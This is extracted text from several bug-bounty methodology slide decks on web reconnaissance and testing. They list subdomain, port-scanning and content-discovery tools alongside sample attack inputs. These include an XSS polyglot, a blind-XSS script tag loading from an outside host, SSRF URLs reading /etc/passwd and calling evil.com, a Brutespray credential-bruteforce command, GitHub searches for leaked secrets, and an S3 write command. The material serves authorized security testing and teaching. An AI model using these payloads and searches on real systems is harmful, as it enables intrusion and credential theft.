10,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848
,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389,280,4567,7001,8008,9080 -iL
$TARGET_LIST --max-rate 100000 -oG $TARGET_OUTPUT
nmap zzz
∞
Interlude... credential bruteforce
Brutespray
Nmap service
masscan credential
scan -oG
bruteforce
Interlude... credential bruteforce
★ Because of the nature of scraping and dns redirects

some sites will be gone or the same.
★ We also don’t know what protocol these are on
(http vs https, ++)
On App Discovery
WALKING & UNDERSTAND THE APP
and CVE searching
TBHMv1
Coverage for Heavy js sites
★ ZAP Ajax Spider

★ Jsparser
★ linkfinder
jsparser
Linkfinder
Content Discovery /
Directory Bruting
TBHMv1
❏ Patator
❏ WPScan
❏ cmsmap
★ Gobuster
★ ¯\_(ツ)_/¯
CommonSpeak and
Scans.io data
★ Subdomain data is
awesome
Parameter Bruting?
★ Can be combined with backslash scanners top 2500 alexa params
Domain Domain
scraping for Portscan
discovered TLDs new IP ranges
ASNs enumall
Reverse Whois Massdns masscan
sublist3r eyewitness
Acquisitions Manual
++
++

Builtwith Patator or gobuster

Wappalyzer Wordlists Parameth
++ Burp Burp analyze target
XSS
XSS (not a lot)
TBHMv1
❏ polyglots
❏ Seclists (what up dan!)
❏ Flash
❏ Common input vectors
★ Blind XSS Frameworks
○ Sleepy Puppy (python)
○ XSS Hunter (python)
○ Ground control (Ruby)(small)
★ Polyglots
★ Xss mindmap
Blind XSS
G
BU
1 Jamie: I really
enjoy my super
Frans: I really admin access
enjoy my NEW this morning !!!
super admin
access this
morning !!! “><script src=//y.vg></script> 2
4
l !!#!
vascript shel
Y.vg is a a ja
3
XSSHunter
Payload:
★ The vulnerable page's URI

★ Origin of Execution
★ The Victim's IP Address
★ The Page Referer
★ The Victim's User Agent
★ All Non-HTTP-Only Cookies
★ The Page's Full HTML DOM
★ Full Screenshot of the Affected
Page
★ Responsible HTTP Request (If an
XSS Hunter compatible tool is
used)
★ Nod to beef & XSShell
XSS Polyglot #4
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csV
g/<sVg/oNloAd=alert()//>\x3e
Jackmasa’s
XSS
Mindmap
https://github.com/jhaddix/XSS.png
Server Side Template
Injection
SSTI
TBHMv1
❏ Nothing
Core Idea: Does the application utilize a template engine? ++

★ Engine identification
○ WAPPalyzer + BuiltWith + Vulners scanner
○ Test fuzzing
○ Tooling
○ TPLmap + tplmap Burp Extension
○ Backslash powered scanner?
★ Resources
SSTI
SSTI Tooling
Server Side Template Injection & Logic
/ Debug parameters
{regex + perm} template content
preview redirect
id
view
activity
name
http://acme.com/script?name={{2*3}}
Server Side Request
Forgery
SSRF Common Parameters or Injection
points from TBHMv1
TBHMv1 ★ Where? file= folder=
❏ Nothing ★ Resources
❏ Well kinda... SSRF ○ SSRF Bible (black magic)
location= style=
(visually) looks very ★ Exploit locale= template=

similar to LFI / RFI / ○ Burp Collaborator
Path/dir Traversal! ★ Honourable mention:
path= doc=
❏ REMIX! ○ display= source=
○ ^ “Blind detection of load= pdf=

path
traversal-vulnerable read= dest=
file uploads” retrieve= continue=

SSRF (GET examples)
http://ACME.com/redirect.php?url=http://google.com
http://ACME.com/redirect.php?url=//google.com
http://ACME.com/redirect.php?url=google.com
http://ACME.com/redirect.php?url=/PATH/SOMETHING/here
http://ACME.com/redirect.php?url=file:///etc/passwd
http://acme.com/ssrf.php?url=tftp://evil.com:12346/TESTPACKET
SSRF Resources
SSRF Resources
★ protocol
and
schema
mappings
★ Exploit
examples
Server Side Request Forgery
Many on the File Includes / Dir Traversal table
{regex + perm} dest {regex} redirect {regex + perm} uri {regex} path
{regex} continue {regex + perm} url {regex} window {regex} next
{regex} data {regex} reference {regex + perm} site {regex} html
{regex + perm} val {regex} validate {regex} domain {regex} callback
{regex} return {regex + perm} page {regex} feed {regex} host
{regex} port
http://acme.com/script?uri=ftp://site
Code Inj, CDMi, & Future
Fuzzing, ++
Code Injection + CMD
Injection + New Fuzzing
TBHMv1
❏ Sqli ★ Commix
❏ Polyglot ○ CMDi
❏ Seclists ○ Supports php code inj
❏ Sqlmap ★ Unknown Identification
❏ Params ○ Backslash Powered Scanner
❏ Tooling ★ resources
❏ resources albinowax (James Kettle)
IDOR - MFLAC
★ IDs
★ Hashes
★ Emails
Insecure Direct Object Reference
{regex + perm} id {regex + perm} user
{regex + perm} account {regex + perm} number
{regex + perm} order {regex + perm} no
{regex + perm} doc {regex + perm} key
{regex + perm} email {regex + perm} group
{regex + perm} profile {regex + perm} edit REST numeric paths
http://acme.com/script?user=21856
Code Injection + CMD
Injection
★ Commix pros
○ Command injection
○ Supports php code inj
○ Custom modules
○ PS & PY shells
○ Put many memes in their slides
Backslash Powered Scanner
★ Generic payloads for any stack
○ Send a ‘ get an error
○ Send a \‘ and the backslash escapes your injection
character
★ Multi-tiered, Simple, and effective response analyzing
○ Response code
○ Response size
○ keywords
★ Watch the video then read the paper =)
○ https://broadcast.comdi.com/r7rwcspee75eewbu8a0f
○ http://blog.portswigger.net/2016/11/backslash-pow
ered-scanning-hunting.html
Infrastructure & Config
Subdomain takeover!
★ Pretty simple, check for cnames that

resolve to these services, if the
service has lapsed, register and
profit!
Subdomain Takeover
Robbing Misconfigured Sh** (AWS)
Robbing Misconfigured Sh** (git)
WAF
★ Often on newer websites we are
hampered by WAF or CDN vendors
security products
○ Cloudflare and Akamai
○ Dedicated WAFs
★ Solutions:
○ Encoding (meh)
○ Finding origin
○ Finding Dev
★ https://twitter.com/jhaddix/status/908044285437726726?lang=en
What’s in a name?
★ Dev.domain.com
★ Stage.domain.com
★ ww1/ww2/ww3...domain.com
★ www.domain.uk/jp/...
★ ...
★ https://twitter.com/Jhaddix/status/964714566910279680
SOAP Services
Bespoke .nfo
Bespoke .nfo
resources!
SSRF Pivoting from blind SSRF to RCE with HashiCorp http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF
Resources
Consul - Peter Adkins -to-RCE-with-Hashicorp-Consul.html
Exploiting Server Side Request Forgery on a https://sethsec.blogspot.com/2015/12/exploiting-server-side-requ

Node/Express Application (hosted on Amazon est-forgery.html
EC2) - Seth Art
Server-side browsing http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_co

considered harmful - Nicolas Grégoire nsidered_harmful.pdf
How To: Server-Side Request Forgery (SSRF) - https://www.hackerone.com/blog-How-To-Server-Side-Request-F

Jobert Abma orgery-SSRF
Escalating XSS in PhantomJS Image Rendering to http://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-r

SSRF/Local-File Read - Brett Buerhaus endering-to-ssrflocal-file-read/
Burp, Collaborate, and Listen: A Pentester https://www.bishopfox.com/blog/2016/02/burp-collaborate-listen-

Reviews the Latest Burp Suite Addition - Max pentester-reviews-latest-burp-suite-addition/
Zinkus
CommInj Pivoting from blind SSRF to RCE with HashiCorp http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF
Resources
Consul - Peter Adkins -to-RCE-with-Hashicorp-Consul.html
Exploiting Server Side Request Forgery on a https://sethsec.blogspot.com/2015/12/exploiting-server-side-requ

Node/Express Application (hosted on Amazon est-forgery.html
EC2) - Seth Art
Server-side browsing http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_co

considered harmful - Nicolas Grégoire nsidered_harmful.pdf
How To: Server-Side Request Forgery (SSRF) - https://www.hackerone.com/blog-How-To-Server-Side-Request-F

Jobert Abma orgery-SSRF
Escalating XSS in PhantomJS Image Rendering to http://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-r

SSRF/Local-File Read - Brett Buerhaus endering-to-ssrflocal-file-read/
Burp, Collaborate, and Listen: A Pentester https://www.bishopfox.com/blog/2016/02/burp-collaborate-listen-

Reviews the Latest Burp Suite Addition - Max pentester-reviews-latest-burp-suite-addition/
Zinkus
SSTI Original Whitepaper - James
Kettle
http://blog.portswigger.net/2015/08/server-side-template-injection.html
Resources
OWASP SSTI Workshop - https://speakerdeck.com/owaspmontreal/workshop-server-side-template-i
Gérôme Dieu njection-ssti
Exploring SSTI in https://www.lanmaster53.com/2016/03/exploring-ssti-flask-jinja2/

Flask/Jinja2 - Tim Tomes
https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/
Injecting Flask - Ryan Reid https://nvisium.com/blog/2015/12/07/injecting-flask/
Hi Pete!
Rails Dynamic Render to https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-201
RCE (CVE-2016-0752) - 6-0752/
John Poulin
uber.com may RCE by Flask https://hackerone.com/reports/125980

Jinja2 Template Injection -
Orange Tsai
Links Peter Yaworski https://leanpub.com/web-hacking-101
Andy Gill https://leanpub.com/ltr101-breaking-into-infosec
aboul3la https://github.com/aboul3la/Sublist3r
jhaddix https://github.com/jhaddix/domain
Tim tomes https://bitbucket.org/LaNMaSteR53/recon-ng
@infosec_au & https://github.com/infosec-au/altdns

@nnwakelam
blechschmidt https://github.com/blechschmidt/massdns
robertdavidgraham https://github.com/robertdavidgraham/masscan
jhaddix - all.txt https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
anshumanbh https://github.com/anshumanbh/brutesubs
OJ Reeves https://github.com/OJ/gobuster
Links epinna https://github.com/epinna/tplmap
https://github.com/mak-/parameth
https://gist.github.com/anshumanbh/96a0b81dfe318e9e9560
13209e178fa9
https://github.com/ChrisTruncer/EyeWitness
https://github.com/jackmasa/XSS.png
https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66
354a056
https://github.com/lorenzog/dns-parallel-prober
Links SSRF Bible https://docs.google.com/document/d/1v1TkWZtrhzRLy0bY
XBcdLUedXGb9njTNIJXa3u9akHM/edit#
https://github.com/ewilded/psychoPATH
https://github.com/commixproject/commix
Links https://github.com/qazbnm456/awesome-web-security
https://github.com/infoslack/awesome-web-hacking
https://github.com/djadmin/awesome-bug-bounty
Jason Haddix - @jhaddix
jhaddix@bugcrowd.com
The Bug Hunters
Methodology v3(ish)
Video: https://www.youtube.com/watch?v=Qw1nNPiH_Go
whoami

★ VP of Trust and Security @Bugcrowd
★ 2014-2015 top on Bugcrowd (Top 20 currently)
What this talk is about...
s
history && topics

(still) light reading
Discovering IP Space
ASN’s
★ autonomous system number - http://bgp.he.net

ARIN & RIPE
★ https://whois.arin.net/ui/query.do
★ https://apps.db.ripe.net/db-web-ui/#/fulltextsearch
Rev whois
★ https://reverse.report/
Shodan Organization
★ https://www.shodan.io/search?query
=org%3A%22Tesla+Motors%22
(Brands & TLDs)
Brand / TLD Discovery
Brand ★ Wikipedia the ORG

Acquisitions ★ Crunchbase Acquisitions section
Discovery
Linked ★ *BURP* Spidering

Discovery
Weighted Link
and REVERSE ★ DomLink
TRACKER analysis ★ bUILTWITH
Acquisitions
Linked Discovery (Burp Demo)
1) Turn off passive scanning

2) Set forms auto to submit (if you’re feeling frisky)
3) Set scope to advanced control and use string of target name (not a normal FQDN)
4) Walk+browse, then spider all hosts recursively!
5) Profit (more targets)!
DomLink
Vincent Yiu @vysecurity

Builtwith
Builtwith
Others
★ Trademark In Google: ” "Tesla © 2016" "Tesla © 2015" "Tesla © 2017" inurl:tesla

(Subdomains)
Subdomain Scraping
It’s all about sources

Sublist3r Amass
● Amass by jeff Foley - @jeff_foley
● https://github.com/caffix/amass
● Includes reverse DNS methods
● Includes permutation scanning:
○ dev-1.netflix.com, Dev-2.netflix.com
root@Test2:~/tools/amass# cat amass.sh
#!/bin/bash
mkdir $1
touch $1/$1.txt
amass -active -d $1 |tee /root/tools/amass/$1/$1.txt
Sublist3r Subfinder
● Subfinder by ICEMAN
● https://github.com/ice3man543/subfinder
● Json output, multi resolver for bruteforce, ++
root@Test2:~/tools/subfinder# cat subfinder.sh
#!/bin/bash
mkdir $1
touch $1/$1.txt
subfinder -d $1 |tee /root/tools/subfinder/$1/$1.txt
Fancy table referencing runtimes ++
amass Both subfinder

blah jUST USE BOTH blah
jUST USE BOTH
I Don’t use anymore:

● Enumall / Recon-NG (not great on sources or speed)
● Aquatone (not great on sources) but aquatone-scan is useful
● Sublist3r (same as above)
● Anything else for scraping
● ClouDflare Enum (although sometimes i think about it)
○ https://github.com/mandatoryprogrammer/cloudflare_enum
Subdomain Brute Forcing
subfi
1,136,964 line subdomain dictionary (all.txt) nder
Tool Time to run Threads Found ?
gobuster 21m15.857s 100 87




Sub Bruting
With Massdns (or subfinder), why not all of them?
all.txt
80a018c66354a056
CommonSpeak and
Scans.io data
★ Subdomain data is awesome

★ URL data has been less useful
Auxiliary
★ Dnssec / nsec / nsec3 walking
○ Ldnsutils, nsec3walker, nsec3map
★ Github recon
https://github.com/appsecco/bugcrowd-levelup-subdomain-enum
○ Search for goodies eration/blob/master/esoteric_subdomain_enumeration_techni
ques.pdf
★ Dorking: ads key, priv pol, tos, aws, s3
https://www.youtube.com/watch?v=1Kg0_53ZEq8
Enumerating Targets
Port Scanning
Masscan 11m4.164s 196

masscan -p1-65535 -iL $TARGET_LIST --max-rate 10000 -oG $TARGET_OUTPUT
nmap zzz
∞
#!/bin/bash
strip=$(echo $1|sed 's/https\?:\/\///')
echo ""
echo "##################################################"
host $strip
echo "##################################################"
echo ""
masscan -p1-65535 $(dig +short $strip|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1)
--max-rate 1000 |& tee $strip_scan
Credential bruteforce
Brutespray
Nmap service
masscan credential https://github.com/x90skysn3k/brutespray
scan -oG
bruteforce
python brutespray.py --file nmap.gnmap -U

/usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt
--threads 5 --hosts 5
Credential bruteforce
★ Because of the nature of scraping and dns redirects some sites will be
gone or the same.
★ We also don’t know what protocol these are on (http vs https, ++)
Aquatone? Httpscreenshot?
Wayback Enumeration
TIME OUT
Xmind Organization
★ Green w/ checkmark is Done

★ Orange is in progress
★ Red is vulnerable
Demo
and CVE searching
TBHMv1
Parsing JavaScript
Coverage for Heavy js sites
★ ZAP Ajax Spider

★ Jsparser
★ linkfinder
Linkfinder
jsparser
Feeding these tools
Content Discovery
Content Discovery /
Directory Bruting
TBHMv1
❏ Patator
❏ WPScan
❏ cmsmap
★ Gobuster
★ ¯\_(ツ)_/¯
Content Discovery / Directory Bruting
★ https://gist.github.com/jhaddix/b80
ea67d85c13206125806f0828f4d10
★ But still gold
Parameter Bruting?
★ Can be combined with backslash scanners top 2500 alexa params
Domain Domain
scraping for Portscan
discovered TLDs new IP ranges
ASNs aMASS
Reverse Whois Massdns masscan
SUBFINDER eyewitness
Acquisitions Manual
++
++

Builtwith gobuster
Wappalyzer Wordlists Parameth
++ Burp Burp analyze target
XSS
Blind XSS Frameworks Continued!
u p p or t
SMS S
Server Side Request
Forgery
What to do with SSRF?
https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b
Insecure direct object
reference
IDOR - MFLAC
★ IDs
★ Hashes
★ Emails
Insecure Direct Object Reference
{regex + perm} id {regex + perm} user
{regex + perm} account {regex + perm} number
{regex + perm} order {regex + perm} no
{regex + perm} doc {regex + perm} key
{regex + perm} email {regex + perm} group
{regex + perm} profile {regex + perm} edit REST numeric paths
http://acme.com/script?user=21856
Infrastructure & Config
Subdomain takeover!
★ Pretty simple, check for cnames that

resolve to these services, if the
service has lapsed, register and
profit!
Subdomain Takeover
Robbing Misconfigured Sh** (AWS)
WAF
★ Often on newer websites we are
hampered by WAF or CDN vendors
security products
○ Cloudflare and Akamai
○ Dedicated WAFs
★ Solutions:
○ Encoding (meh)
○ Finding origin
○ Finding Dev
★ https://twitter.com/jhaddix/status/908044285437726726?lang=en
What’s in a name?
★ Dev.domain.com
★ Stage.domain.com
★ ww1/ww2/ww3...domain.com
★ www.domain.uk/jp/...
★ ...
★ https://twitter.com/Jhaddix/status/964714566910279680
The future of TBHM
Old

New! Bugcrowd University
It's the Little Things II
Exploiting Vulnerabilities Through Proper Reconnaissance
Ben Sadeghipour (@Nahamsec)

Intro
● Researcher, pentester, hacker, and bug bounty

participant
● Hacker Operations Lead at HackerOne
● 600+ valid vulnerabilities to ~100 companies on
HackerOne (Department of Defense, Airbnb,
Oath/Yahoo, Snapchat, Valve, Zendesk, etc.)
● Bug Bounty Forum co-founder
(@bugbountyforum)
2 @nahamsec
AGENDA 1. Overview
2. Asset Discovery
3. Content Discovery
4. Automation
5. Digital Dumpster Diving
6. Real Life Examples
3 @nahamsec
Why?
● Self improvement
● Networking
● My career was built / boosted thanks to
bug bounties
4 @nahamsec
Why?
● Networking
bug bounties
● Competition makes it more fun
5 @nahamsec
Why?
● Networking
bug bounties
6 @nahamsec
Why?
● Networking
bug bounties
● … who doesn’t like extra cash?
7 @nahamsec
Reconnaissance
8
Recon (Definition)
In military operations, reconnaissance or scouting is the
exploration outside an area occupied by friendly forces to gain
information about natural features and other activities in the area.
9 @nahamsec
Recon (Definition)
● Understanding how the application is built
● Understanding how the application processes data
● Finding all possible “entry” points or company assets
● and finding as many files, folders, or endpoints
10 @nahamsec
11 @nahamsec
Asset Discovery
12
13 @nahamsec
Asset Discovery
● sublist3r
● enumall
● Brute force ● massdns
● Find different environments (.dev, ● altdns
.corp, .stage, uat, etc.) ● brutesubs
● dns-parallel-prober
● Brute force again
● dnscan
○ Different permutations ● knockpy
○ Different environment ● tko-subs
■ dashboard.dev.site.com vs ● HostileSubBruteforce
dashboard-dev.site.com
Google Dork: site.com +inurl:dev -cdn

14 @nahamsec
Asset Discovery
● sublist3r
● enumall
● massdns
● altdns
● brutesubs
● dns-parallel-prober
● dnscan
● knockpy
● tko-subs
● HostileSubBruteforce
15 @nahamsec
Certificate Transparency
How do you find more?
16
Censys
● Look for SSL certificates:
○ Example: 443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names:snapchat.com
17 @nahamsec
Shodan
● Search by hostname
● Filter for
○ Ports: 8443, 8080, 8180, etc
○ Title: “Dashboard [Jenkins]”
○ Product:Tomcat
○ Hostname: somecorp.com
○ Org: evilcorp
○ ssl: Google
18 @nahamsec
Certspotter
● Great API
● Easy to automate:
○ Make a bash alias
○ Automate
○ Win
19 @nahamsec
Certspotter
● Great API
● Easy to automate: We’ll get to this later
○ Make a bash alias
○ Automate
○ Win
20 @nahamsec
Crt.sh
● Great API and web interface
● Allows using a wild card
● Sometimes you get different results from differents
sources
Search query: Identity LIKE 'www.snapchat.%'
https://crt.sh/?q=www.snapchat.%
$ curl 'https://crt.sh/?q=%.'$1'&output=json' | jq '.name_value' | sed 's/\"//g' | sed 's/\*\.//g'
21 @nahamsec
OSINT
What about other properties?
22
23 @nahamsec
Acquisitions
● Usually in scope (after 6

months)
● Geared towards bigger
companies: Facebook,
Google, Yahoo, etc.
24 @nahamsec
ARIN
25 @nahamsec
ARIN
26 @nahamsec
ARIN
27 @nahamsec
Shodan also helps with this
ARIN
28 @nahamsec
Content Discovery
Where the fun begins
29
30 @nahamsec
Content Discovery
● Port scan
31 @nahamsec
Content Discovery
● Port scan
● Screenshot open ports (default:
80, 443)
32 @nahamsec
Content Discovery
● Port scan
● Screenshot open ports (default:
80, 443)
● Look for interesting
○ Files
○ Directories
33 @nahamsec
Example
● You see an open port on example.com:8433
34 @nahamsec
Example
● You see an open port on example.com:8433
● Directory brute force
35 @nahamsec
Example
● You see an open port on 8433
● /admin/ returns 403
36 @nahamsec
Example
● You brute force for more files/directories on /admin/
37 @nahamsec
Example
● /admin/users.php returns 200
38 @nahamsec
Example
● /admin/users.php returns 200
● Repeat on other domains, ports, folders, etc.
39 @nahamsec
Content Discovery
● Nmap common ports
(3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,1 ● dirbuster
0000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7 ● gograbber
077,4040,9000,8089,443,7447,7080,8880,8983,5673,7443)
● gobuster
● Take screenshots (webscreenshot.py)
● dirsearch
● Directory/File brute force ● Probably more tools out there?
40 @nahamsec
Content Discovery
● Nmap common ports
(3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,1 ● dirbuster
0000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7 ● gograbber
077,4040,9000,8089,443,7447,7080,8880,8983,5673,7443)
● gobuster
● Take screenshots (webscreenshot.py)
● dirsearch
● Directory/File brute force ● Probably more tools out there?
● Robots.txt sometimes does
this for you ¯\_(ツ)_/¯
41 @nahamsec
Content Discovery
● ALWAYS keep an archive of your reports..
42 @nahamsec
Content Discovery
● ALWAYS keep an archive of your reports..
43 @nahamsec
Automation
44
45 @nahamsec
AWS Recon
● Look for S3 buckets on Google

(site:s3.amazonaws.com +
inurl:company_name )
● AWS instances (site:amazonaws.com -s3)
● Repeat on Github!
● Automate your work...
46 @nahamsec
AWS Recon
48 @nahamsec
S3 Automation
49 @nahamsec
S3 Automation
50 @nahamsec
Certspotter
● Great API
● Easy to automate:
○ Make an alias
○ Automate
○ Win
51 @nahamsec
Create aliases
certspotter(){
curl -s https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed
's/\*\.//g' | sort -u | grep $1 > ~/$1/$1.txt
}
52 @nahamsec
Create aliases
certspotter(){
's/\*\.//g' | sort -u | grep $1 > ~/$1/$1.txt
}
dirbruteforce(){
cd /tools/dirsearch
cat ~/$1/$1.txt | while read line; do python3 dirsearch.py -e . -u "https://$line"; done
}
53 @nahamsec
Create aliases
certspotter(){
's/\*\.//g' | sort -u | grep $1 > ~/$1/$1.txt
}
dirbruteforce(){
cd /tools/dirsearch
}
screenshot(){
python ~/tools/webscreenshot/webscreenshot.py -o ./$1/screenshots/ -i ~/$1/$1.txt --timeout=10 -m
}
54 @nahamsec
Create aliases
certspotter(){
's/\*\.//g' | sort -u | grep $1 > ~/$1/$1.txt
}
dirbruteforce(){
cd /tools/dirsearch
}
screenshot(){
python ~/tools/webscreenshot/webscreenshot.py -o ./$1/screenshots/ -i ~/$1/$1.txt --timeout=10 -m
}
recon(){
certspotter $1
dirbruteforce $1
screenshot $1 Game changer
}
55 @nahamsec
Put your aliases together
recon(){
certspotter $1
dirbruteforce $1
screenshot $1
[...]
}
56 @nahamsec
LazyRecon
57 @nahamsec
LazyRecon
58 @nahamsec
LazyRecon
59 @nahamsec
60 @nahamsec
Digital Dumpster Diving
61
(I’m a pro at it)
62
● Leaked credentials
● Leaked api_tokens
● Leaked authorization headers
● […]
63 @nahamsec
● Leaked credentials
● Leaked api_tokens
● Leaked authorization headers
● […]
Do you see a pattern here?
64 @nahamsec
Github Recon
Tools and Keywords
● gitrob
● git-all-secrets
● truffleHog
● git-secrets
● repo-supervisor
● Do it manually?
65 @nahamsec
APP_SECRET
Github Recon consumerkey
JIRA_Password
Examples
jdbc
“authorization bearer”
● “company.com” “dev” auth_key
consumer_secret
● “dev.company.com” SECURITY-SIGNATURE
● “company.com” API_key X-API
X-Paypal
● “company.com” password secret_key
● “api.company.com” authorization JWK/JWT
SSO_LOGIN
● GET CREATIVE! defaultEndpointsProtocol
access_key
accountKey
AWS_Secret
aws_secret_access_key
rexis
api_key
66 @nahamsec
Archive.org (Wayback Machine)
“That's when I found this. An end of

the world party featuring DJ
Mobley. I'm not an EDM fan myself,
but a quick search on the wayback
machine, and guess what we found
all the way from 2003. You. An
Angelfire page that you created
from back in the day. Your very
own DJ Mobley fan page.”
67 @nahamsec
Archive.org
● Search for your target

● Select a date
● Review the source -> find
JS files
● Find old
endpoints/functionality
● Exploit them!
68 @nahamsec
Javascript Files
Why?
69 @nahamsec
Javascript Files
● Look for (hidden) endpoints

● Leaked cloud instances and
secret_keys
● … and definitely more bugs
70 @nahamsec
Javascript Files

● Leaked cloud instances and their
secret_keys
71 @nahamsec
Javascript Files
Examples

● Leaked cloud instances and their
secret_keys
72 @nahamsec
Trello Boards
● Site:trello.com intext:ftp
● Site:trello.com intext:ORG
73 @nahamsec
Trello Boards
● Site:trello.com intext:ftp
● Site:trello.com intext:ORG
74 @nahamsec
Examples
75
Examples of Certificate
Transparency
76
Shodan Examples
Search Query: hostname:host.com port:15672
Search Query: hostname:host.com title:Dashboard [Jenkins]
77 @nahamsec
Censys Examples
● Working example:
78 @nahamsec
Examples of
Discovering Endpoints
Hidden Inside of
Javascript Files
79
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
80 @nahamsec
API Requests
https://www.airbnb.com/api/v2/air_sms_notifications
● Requires that you have a verified phone number in your

profile.
● This API request allowed you to send yourself SMS texts.
● There is a length limit on the SMS messages (160)
● Throttling restrictions on SMS only allowed you to send this
API request a handful of times every hour
81 @nahamsec
API Requests
https://www.airbnb.com/api/v2/air_push_notifications
● Requires that you have a verified phone number, the Airbnb

app installed on your phone (with that phone number), and
you are logged into the app with that account. (This one took
awhile to figure out)
● Instead of sending SMS, it pushed notifications to your
phone through the phone app.
● There is no length restriction on the output.
● No throttling which made testing a lot easier compared to
SMS
82 @nahamsec
POST REQUEST:
{"_format":"for_visitor","country":"USA","phone_number":"","template":"messag
e","user_id":,"title":"","body":"","metadata":{},"object_id":"","status":"","
role":"","photo_url":""}
If you passed in an invalid template it would give you a list of all the valid templates that
you could send.
83 @nahamsec
84 @nahamsec
Then we found out we can send ourselves custom messages:
{"_format":"for_visitor","country":"USA","phone_numb
er":"","template":"custom","user_id":109764261,"stat
us":"test","title":"test","body:"test"}
85 @nahamsec
What else can we do?
86 @nahamsec
Perhaps enumerate on user_id or object_id in each

request and get access to other users’ notifications?
87 @nahamsec
Perhaps enumerate on user_id and object_id in each

request and get access to other users’ notifications?
88 @nahamsec
Examples of Digital
Dumpster Diving
89
Dumpster Diving Part 1
● Looked up the “umbrella” company name
90 @nahamsec

● Combine “umbrella_company” + asset_name +
“password”, and found this code on Github:
"server": {
"host": "dedXXXX.PATTERN.PROVIDER.com",
"port": 21,
"user": "some_username",
"password": "definitely_ftp_passwords"
}
91 @nahamsec

● Combine “umbrella_company” + asset_name +
“password”, and found below code:
"server": {
"host": "dedXXXX.PATTERN.PROVIDER.com",
"port": 21,
"user": "some_username",
"password": "definitely_ftp_passwords"
}
● Got access to umbrella_company’s FTP server
92 @nahamsec
93 @nahamsec
94 @nahamsec
95 @nahamsec
96 @nahamsec
Example of
Readable/Writable S3
Buckets
97
AWS CLI
● Requires AWS CLI

● $ aws s3 ls s3://bucket-name
● $ aws s3 cp hax0r.txt s3://bucket-name
98 @nahamsec
CNAME Pointing to Unclaimed AWS S3
● Requires AWS CLI

● $ aws s3 ls s3://bucket-name
● $ aws s3 cp hax0r.txt s3://bucket-name
99 @nahamsec
Recon Automation +
Github +
Exploitation
100
101@nahamsec
Access to all internal API endpoints?
● Asset discovery https://stgsomethjngsomething.something.target.com/

● Content discovery:
https://stgsomethjngsomething.something.target.com/internal and
102@nahamsec

https://stgsomethjngsomething.something.target.com/internal and
● Github searches:
103@nahamsec

https://stgsomethjngsomething1.something.target.com/internal and
● Github searches:
● Looked for the: hostname+ internal + “auth-token” (on github and found this
handy curl command:
104@nahamsec
105@nahamsec
106@nahamsec
● Looked into the JS files on the login page

● Found all of the internal API calls
● Already have an AUTH-TOKEN that works without login
● Combine all of the above:
curl -X GET
"https://devsomething.something.target.com/ internal/internal_somet
hing/internal_something_accounts" -H "SOME_KEYWORD-auth: INTERNAL"
-H "debug-token: SORRY_I_HAD_TO_REDACT"
107@nahamsec

curl -X GET
"https://devsomething.something.target.com/ internal/internal_accou
nts" -H "SOME_KEYWORD-auth: INTERNAL" -H "debug-token:
SORRY_I_HAD_TO_REDACT"
Return all LDAP usernames for brute force ;)?
108@nahamsec

● curl -X GET "https://dev1.dev.target.com/v3/internal/internal_accounts" -H
"preferred-auth: INTERNAL" -H "debug-auth-token: SORRY_I_HAD_TO_REDACT"
109@nahamsec
Keep in touch
● @nahamsec on all social media

● Check out all of our programs on hackerone.com/directory
● Bensdp@hackerone.com | im@ha.cker.af
110@nahamsec
Tools
● Dirsearch - https://github.com/maurosoria/dirsearch
● JSParser - http://github.com/nahamsec/jsparser
● LazyS3 - https://github.com/nahamsec/lazys3
● LazyRecon - https://github.com/nahamsec/lazyrecon
● Teh_s3_bucketeers - https://github.com/tomdev/teh_s3_bucketeers
111@nahamsec
Thank you
● Thank YOU for letting me present

● The Hacker Community for being so welcoming and sharing their ideas
● A big thank you to: Ziot, Tomdev, ITSecurityguard, Jon Bottarini, Luke Tucker,
Smiegles, Jobert Abma, Michiel Prins.
112@nahamsec
Thank You
113
Recon Like A Boss
More Targets- More Options-
More Opportunities
AGENDA
• Increase Your Attack Area
• Determine Technologies used by Website.
• Amazon Web Service (AWS) Recon & Hacking
• Github Recon
• Content Discovery
Increase Your
Attack Area
Recon- Go Back in Time
• Wayback Machine to view old files like robots.txt
and URLs
Recon- Go Back in Time
• Tools are out to automate this
• waybackurls.py
Download:
https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b3720
50
• waybackrobots.py
Download:
https://gist.github.com/mhmdiaa/2742c5e147d49a804b408bfed3d32
d07
Now We Have
Waybackurls
Sub-domains Discovery
• Brute force on main domain
• Some scripts to automate this task
– Knockpy:-
https://github.com/guelfoweb/knock
– Sublist3r:-
https://github.com/aboul3la/Sublist3r
– SubBrute
https://github.com/TheRook/subbrute
Knockpy
• Usage: ./knockpy target.com
Sublist3r
• Usage: python sublist3r.py -d target.com
Sublist3r Cont.
• Find sub-domains with specific open ports
• Usage: python sublist3r.py -d target.com -p 80,443
SubBrute.
• Usage: ./subbrute.py google.com
• You can give list of domains like this

Usage: ./subbrute.py -t list.txt
